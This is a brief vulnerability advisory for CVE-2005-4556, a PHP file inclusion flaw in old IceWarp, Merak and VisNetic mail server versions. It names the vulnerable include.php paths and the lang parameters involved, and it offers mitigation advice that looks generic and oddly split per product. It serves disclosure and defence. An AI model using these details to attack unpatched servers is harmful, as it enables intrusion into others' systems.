CVE-2005-4556

Name of the Vulnerable Software and Affected Versions IceWarp Web Mail version 5.5.1 Merak Mail Server version 8.3.0r VisNetic Mail Server version 8.3.0 build 1

Description The issue allows remote attackers to include arbitrary local and remote PHP files via a URL in the lang settings and language parameters in certain PHP files, specifically in accounts/inc/include.php and admin/inc/include.php, when register globals is enabled.

Recommendations For IceWarp Web Mail version 5.5.1, consider disabling the register globals setting to prevent exploitation. For Merak Mail Server version 8.3.0r, restrict access to the accounts/inc/include.php and admin/inc/include.php files until a fix is available. For VisNetic Mail Server version 8.3.0 build 1, avoid using the lang settings and language parameters in the affected API endpoints until the issue is resolved. As a temporary workaround, consider restricting the use of the include.php files in the affected directories to minimize the risk of exploitation.